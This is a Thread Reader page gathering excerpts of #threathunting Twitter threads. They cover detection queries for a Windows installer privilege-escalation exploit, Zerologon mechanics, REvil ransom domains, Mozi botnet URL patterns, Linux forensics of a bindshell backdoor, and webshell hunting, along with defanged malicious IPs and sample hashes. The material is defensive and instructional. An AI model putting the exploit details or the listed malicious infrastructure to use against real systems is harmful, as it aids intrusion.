Discover and read the best of Twitter Threads about #threathunting

Most recents (20)

Spent some time today at work playing with @msftsecurity Windows InstallerFileTakeOver LPE (CVE-2021-41379 bypass -…) and managed to create some detections on it.

Detection will be based on Sysmon/SIEM, here we go... 1/n #threathunting #detection #dfir
The exploit requires the user to overwrite elevation_service.exe with a compromised one (in this case with InstallerFileTakeOver.exe).
We can monitor this using #Sysmon event ID 11 - File Creation events:
event_id:11 AND event_data.TargetFilename:*\\elevation_service.exe
Read 14 tweets
mshtml.dll was loaded into winword process, when Microsoft MSHTML used? I guess, it will be nice for #threathunting perspective
based on sample:…
possible another suspicious loads: ExplorerFrame.dll, ieproxy.dll

#CVE-2021-40444 #DFIR #BlueTeam query on prod enviroment, last 30 days - 0 FPs hists. via (MDATP) @MSThreatProtect
Read 3 tweets
If you want the quickest and easiest way to try out #SecurityOnion, just follow the screenshots below to install an Import node and then optionally enable the Analyst Workstation. This can be done in a minimal VM with only 4GB RAM! ImageImageImage
Start Setup and choose Import node: ImageImageImageImage
Read 17 tweets
Detection Quiz!💡
Look at the process creation events depicted below:
1. Can you recognise the technique?
2. Map it to the @MITREattack
3. Which tool was most likely used?
4. Detection ideas?

#ThreatHunting Image
Columns: Time, Parent, ParentIntegrityLevel, Child, ChildIntegrityLevel
Please, provide your answers in form of 1..2..3..4..
Read 20 tweets
In light of the recent #SupplyChain attack on @KaseyaCorp by #REvil, it is worth paying attention to decoder[.]re included within the ransom notes, used additionally to 'mirror' in TOR network. #Ransomware #Cybersecurity #ThreatIntel #ThreatHunting #Malware Image
Similar to decryptor[.]cc and decryptor[.]top in previous #REvil/#Sodinokibi versions, decoder[.]re is used to grant the victims access to the threat actors WEB-site for further negotiations should their connection be limited via #TOR. Image
To access the page in WWW or TOR - the victim needs to provide a valid UID (e.g. "9343467A488841AC") ImageImage
Read 11 tweets
Here is how to hunt/detect 60% (possibly more than 60%) of lateral movement attacks:
On ALL endpoints, look for EID 4624 with LogonType 9 (NewCredentials), and check TargetOutboundUserName field. 1/4
#threathunting #dfir #lateralmovement
Then, check if the TargetOutboundUserName is supposed to be seen on the endpoint. Here is why:
Attackers most likely spawn a new process on the compromised machine with the credentials/tokens they steal. This is done by using "/NETONLY" flag. 2/4
"/NETONLY" flag generates a new logon on the endpoint with the EID 4624 LogonType 9.
LogonType 9 is quite rare in an environment, usually <1% of all logon events. Therefore, it is quite easy to hunt for this event. 3/4
Read 4 tweets
I've had something in my mind now for a few years, but I never published it. So today, you're getting a short thread on "How to Prepare for #ThreatHunting Using the ABLE Framework".

Good threat hunting starts with a hypothesis. This is, loosely, an educated guess at a type of malicious activity which may be happening. @RobertMLee and I wrote a whitepaper on this, called "Generating Hypotheses for Successful Threat Hunting":…

Once you have the hypothesis, though, then what? That's where the ABLE framework comes in.

There are four key pieces of information you need to know to be ABLE (Ha! Get it?) to hunt. They are:


Read 9 tweets
(1/of a few) Doing some training #threathunting runs with #suricata -with pcap from
Fun fact: Alerts count only for 8% of the total logs produced - we also have protocol logs like Flow records, KRB5, SMB, DNS, TLS, HTTP, DCERPC,Fileinfo Image
(2/of a few)
Just as regular protocol and flow logging of #Suricata gives us:

633 FLOW logs
295 HTTP logs
182 TLS logs
130 DNS logs
114 SMB logs
90 DCERPC logs
66 FILEINFO logs
23 KRB5 logs
2 NTP logs

Let's see some examples of the generated data...
(3/of a few)
Quick and dirty cmd look at the DNS logs generated by #Suricata gives us the domain list for our #threathunting review
Couple of those jump out (at lest to me) Image
Read 17 tweets
A quick thread.

Review of the URL's submitted to URLhaus in the past 30 days.

53109 URLs reported, lets look for patterns; which we can use for threat hunting and detection in DNS entries and proxies logs.

#infosec #cybersecurity #threathunting
25494 of the URLs end with Mozi.m, relating to the Mozi Botnet -…. To detect this, we can look for the regex pattern .*Mozi\.m$

A further 4636 of the URLs end with Mozi.a, related to the above. We can detect this using regex pattern .*Mozi\.a$
Finally, there are 10 URLs which contain Mozi within them in different patterns to above. It is therefore worthwhile searching for any case of Mozi within a URL (This will be greedier than the above, but still worthwhile checking)
Read 11 tweets
#Zerologon via @djrevmoon image h/t @ptswarm

> flaw in cryptographic auth Netlogon Remote Protocol
> insecure use of AES-CFB8
> when encrypting msg of all zeroes w all-zero IV, 1 in 256 chance output all zeroes

Test tool… ImageImageImageImage
Alt exploit #Zerologon by @_dirkjan…
> jump off CVE-2015-0005 SMB
- weird logic set NetlogonValidationSamInfo4 to 6 nets plain text sessionkey for NTLM auth
> similarly relay to auth to RPC DRSUAPI
> 2 DCs


#respect ImageImageImageImage
Read 4 tweets
Wait is over .. Read final part 2 which is focused on aws log data ingestion , #hunting and investigation of Capital one breach TTPs in #AzureSentinel…
T1078: Privileged role attached to Instance.
#AzureSentinel #MITRE #AWS #threathunting…
T1078 : Suspicious credential token access of valid IAM Roles
#AzureSentinel #MITRE #AWS #threathunting…
Read 5 tweets
Let's go step-by-step and do some basic live process forensics for #Linux. Today's contestant is a bindshell backdoor waiting for a connection on Ubuntu. We saw something odd when we ran:

netstat -nalp

#DFIR #threathunting #forensics
netstat -nalp shows a process named "x7" PID with a listening port that we don't recognize. #DFIR Image
First thing we'll do is list out /proc/<PID> to see what is going on. Our PID is 5805:

ls -al /proc/5805

The current working directory is /tmp. The binary was in /tmp, but was deleted. A lot of exploits work out of /tmp and /dev/shm on Linux. This is a major red flag. #DFIR Image
Read 13 tweets
Here's how to recover a #Linux binary from a malicious process that has deleted itself from the disk.

cp /proc/<PID>/exe /tmp/recovered_bin

Let's see how this works. #DFIR #threathunting #forensics
Often, malware deletes itself after it starts so file scanners and integrity checks won't find it. It can make analysis harder if you can't get to the binary easily.

But if you remember /proc/<PID>/exe you can recover any deleted binary.

#DFIR #threathunting #forensics
Use the sleep command to simulate a deleted process:

cd /tmp
cp /bin/sleep x
./x 3600 &
[1] 32031
rm x

This copies the sleep command as "x" under /tmp and runs for 3600 seconds. Then, delete "x" so the binary appears removed. Practice on it.

#DFIR #threathunting #forensics
Read 7 tweets
Threat Hunting In #CyberSecurity : Waiting for an alert can be too dangerous.
Threat hunting means to proactively search for malware or attackers that are hiding in your network — and may have been there for some time.
Most time, the goals of these malware or attackers can be to quietly siphoning off data, patiently listening in for confidential information, or working their way through the network looking for credentials powerful enough to steal key information.
Read 19 tweets
Only about two months later than I originally planned, but here we go. I'll summarise areas we are hiring into in the thread 👇, along with a steer on experience and location where possible (all UK, but happy to make introductions elsewhere).
We have space for a mix of junior and experienced folks in most roles, and there is also a mix of location and partial remote working options depending on the role, so please DM to ask clarification questions or to ask about applying :) A little background on the team:
Cyber Threat Operations is PwC's front-line technical security services group, responsible for a portfolio of blue & red team services to global clients. Blue includes subscription & bespoke #threatintel & research services, short-term & managed endpoint/network threat hunting,
Read 18 tweets
The basis for #SwearEngine is that malware developers are developers too. The catharses in their malware code manifest in a multitude of coarse expressions. Thus we can use the presence of swear words as a "weak signal" to surface interesting files. #threathunting
You may balk at #SwearEngine for being #basic but consider that this rule, looking for PEs with one single "fuck", detects malware samples used by APT5, APT10, APT18, APT22, APT26, Turla, FIN groups, dozens of UNC espionage clusters. Too many to list.
At least one single "fuck" is present in some samples of the following malware families: AGENTBTZ, ASCENTOR, ZXSHELL, SOGU, TRICKBOT, GHOST, VIPER, WANNACRY, WARP, NETWIRE, COREBOT, REMCOS, VIPER, ORCUSRAT, PONY, etc. I can't even name the coolest ones. There are hundreds.
Read 6 tweets
Mal devs themselves introduce some of the funniest & hi-fi (although short lived) detection opportunities. Amongst several applicable HTTP methodologies, we see "Content-Type:application/octect-stream." Don't manually type out your HPTP headers for your C2 protocolols. #dailypcap
This network traffic comes from newish backdoor ExileRAT (compiled 2019-01-30T07:05:47Z) 606e943b93a2a450c971291e394745a6 that was hanging (with a multitude of other evil) on recently #opendir "http://27.126.188[.]212" There are ties to a humongous cluster of probs CN espionage.
The attackers from IP 27.126.188[.]212 are rollin' deep with kit. (1) looks to be some derivative of python toolkit and also does some logging of connections. Sc.dat (2) is HTML that does JS get and creates a scheduled task for the exe.
Read 5 tweets
This is malware analysis 101 for most folks, but I thought I'd share a quick thread on easy .NET analysis using a recent wave of a malicious xlsx downloading PUBNUBRAT. cc @issuemakerslab @blackorbird and @navSi16 who all tweeted about this in Jan. #threathunting #dfir
88017e9f2c277fa05ee07ecc99a0a2dc (홍삼6품단가 .xlsx) is a doc that has multiple follow-on payloads including 05683b9a13910d768b7982d013c31cb9 (U3.conf)... see also 홀리데이 와이퍼(Operation Holiday Wiper)로 귀환한 로켓맨 APT 캠페인 by @alac
05683b9a13910d768b7982d013c31cb9 (U3.conf) is a backdoor that uses the PubNub API (a legit service) for C2 (see @MITREattack's T1102). It's a .NET binary and without its config it doesn't do much a sandbox. How do you detect network C2 over PubNubApi?
Read 8 tweets
My @FireEye friends @DavidPany and @deeemdee4 put out a badass blog on tunneled RDP. What is it? How is it used? What can you do to find it? Read more here:…
Tunneled RDP typically refers to an interactive RDP session that occurs over the same "channel" as another comms session. This is done in a variety of ways, but primarily established through either a backdoor implant or a utility with some sort of port forwarding setup.
On RDP tunneled over SSH with PLINK. We've seen the *standard* PLINK file used. We've also seen PLINK variants with hard-coded parameters and configs and whatnot.
Read 18 tweets
لا أكاد أذكر حادثة من الحوادث الأمنية التي عملت عليها و لم يُستخدم فيها webshell في مرحلة من المراحل، خصوصاً الحوادث التي عملت فيها في منطقتنا (الشرق الأوسط). مجموعة تغريدات عن الـ webshells و أفكار لصيدها (hunting). #threathunting #dfir
الـ webshell عبارة عن malware في شكل script يستهدف الـ web servers (غالباً التي يمكن الوصول إليها من الإنترنت) و يدعم مجموعة من العمليات يستفيد من المهاجم مثل: نقل ملفات/بيانات من و إلي الـنظام، تنفيذ أوامر، عمل tunnels، و هلم جرا...
الـ webshells تستخدم في أكثر من مرحلة من مراحل الهجوم (attack life cycle) مثل:
— Initial Foothold: بعد ايجاد ثغرة تمكن من رفع ملفات علي web server، المهاجم قد يستعمل الثغرة لتحميل webshell علي الخادم مما يعطيه موضع قدم منه يكمل.
Read 18 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!